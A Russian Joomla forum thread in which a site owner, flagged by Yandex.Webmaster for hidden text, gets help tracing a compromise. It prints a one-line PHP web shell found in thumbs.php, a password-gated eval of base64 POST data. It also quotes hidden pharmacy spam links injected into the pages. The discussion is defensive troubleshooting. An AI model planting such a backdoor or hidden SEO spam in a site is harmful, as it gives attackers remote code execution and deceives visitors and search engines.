Как найти скрытый или слабовидимый текст - Joomla 1.5: Общие вопросы

Наши алгоритмы обнаружили на страницах сайта www.eniopsiholog.net, права на который Вы подтвердили в сервисе Яндекс.Вебмастер, скрытый или слабовидимый текст, недоступный пользователям сайта, и предназначенный исключительно для робота поисковой системы. В связи с этим мы вынуждены частично исключить Ваш сайт из поисковой выдачи.

Примеры страниц, на которых обнаружен скрытый текст:
http://www.eniopsiholog.net/component/content/article/221-home-new.html
http://www.eniopsiholog.net/component/content/article/60-soveti-psihologa/268-kto-yua.html
http://www.eniopsiholog.net/component/content/frontpage.html

Пожалуйста, удалите скрытый текст со страниц сайта. Когда изменения будут внесены, сайт вернется в поиск автоматически.

Статистика показывает, что 70% населения земного шара пользуются услугами ясновидящих, магов, парапсихологов, целителей, знахарей.

Эниопсихология

yuri-design, а там есть какая-то СЕО-шная фишка? Интересно... (Я про первый, но затёртый пост)

tmp проверял?

<?php if(md5($_POST["password"])=="5f62de9a319ad2a28d35e87251690f5f"){eval(base64_decode($_POST["code"]));} ?>

хостинг, версию движка, список компонентов?

Список расширений и версии?
Версия ОС на хостинге?
ЗЫ. Случаем не на винде хостинг?

В tmp вот что:  thumbs.php

Код

<?php if(md5($_POST["password"])=="5f62de9a319ad2a28d35e87251690f5f"){eval(base64_decode($_POST["code"]));} ?>

Но что это значит не знаю.

Ок вот почитай http://joomlaforum.ru/index.php/topic,154593.0.html

Здравствуйте!

Приношу свои извинения за задержку с ответом. Фрагмент обнаруженного на сайте скрытого текста прилагаем:

<p style="display: none;">
<a href="http://www.acpq.net/?pid=1">prix viagra</a>
<a href="http://www.acpq.net/?pid=2">viagra prix</a>
<a href="http://www.acpq.net/?pid=3">cialis 20mg</a>
<a href="http://www.acpq.net/?pid=4">cialis generique</a>
<a href="http://www.acpq.net/?pid=5">acheter viagra</a>
<a href="http://www.acpq.net/?pid=6">acheter du viagra</a>
<a href="http://www.acpq.net/?pid=7">viagra acheter</a>
<a href="http://www.acpq.net/?pid=8">cout viagra</a>
<a href="http://www.acpq.net/?pid=9">viagra ou acheter</a>
<a href="http://www.acpq.net/?pid=10">cialis 20 mg</a>
<a href="http://www.acpq.net/?pid=11">prix du viagra</a>
<a href="http://www.acpq.net/?pid=12">viagra le prix</a>
<a href="http://www.acpq.net/?pid=13">viagra a acheter</a>
<a href="http://www.acpq.net/?pid=14">cout du viagra</a>

…и т.д.

Как я уже писал в предыдущем письме, в настоящее время эти ссылки уже не видны на сайте, поэтому после переобхода роботом страницы автоматически восстановятся в поиске.

Скорее всего, данный вид спама появился на сайте в результате взлома. Если Вы не удаляли приведенный нами скрытый текст сами, то это значит, что он исчез из кода произвольно, и может вновь появиться там в любой момент. Рекомендуем сменить все пароли доступа и проверить сайт на наличие уязвимости.

Это не причина, это лишь инструмент. Саппорт в логоле адекватный? Дата изменения этого файла сохранилась?
Логи на это время есть?

Саппорт адекватный. Всегда помогает, но здесь ничем помочь не смог.

В папке Logs тот же вирус был thumbs.php и всё - сколько их у меня и как их всех убить? Чтобы не Яндекс Вебмастер я бы и не знал про эту беду.

Как можно запретить появление или исполнение этого файла thumbs.php в будущем? Одним словом как защититься от этого?

Чтоб понять как - надо понять как он был залит - нужна помощь от саппорта, а именно логи за период его появления

Проверьте все установленные скрипты, особое внимание уделите:
plugins/system/freecap/freecap.php
libraries/domit/php_http_client_generic.php
libraries/domit/php_http_proxy.php

1. Логи за такой большой период не хранят
2. По поводу спамовых скриптов на сайте мой хостер  сказал следующее:
plugins/system/freecap/freecap.php - это вообще не понятно что такое появилось у меня на сайте и откуда появилось, я удалил эту папку

А в последних двух не могу понять, что проверять надо.

Полмесяца это большой?
А еще сказали что хостер адекватный

Наши алгоритмы обнаружили на страницах сайта www.eniopsiholog.net, права на который Вы подтвердили в сервисе Яндекс.Вебмастер, скрытый или слабовидимый текст, недоступный пользователям сайта и предназначенный исключительно для робота поисковой системы. В связи с этим мы вынуждены временно исключить этот сайт из поисковой выдачи.

Примеры страниц, на которых наши алгоритмы обнаружили скрытый текст, приведены ниже:
http://www.eniopsiholog.net/
http://www.eniopsiholog.net/chto-u-vas-v-golove.html
http://www.eniopsiholog.net/component/user/reset.html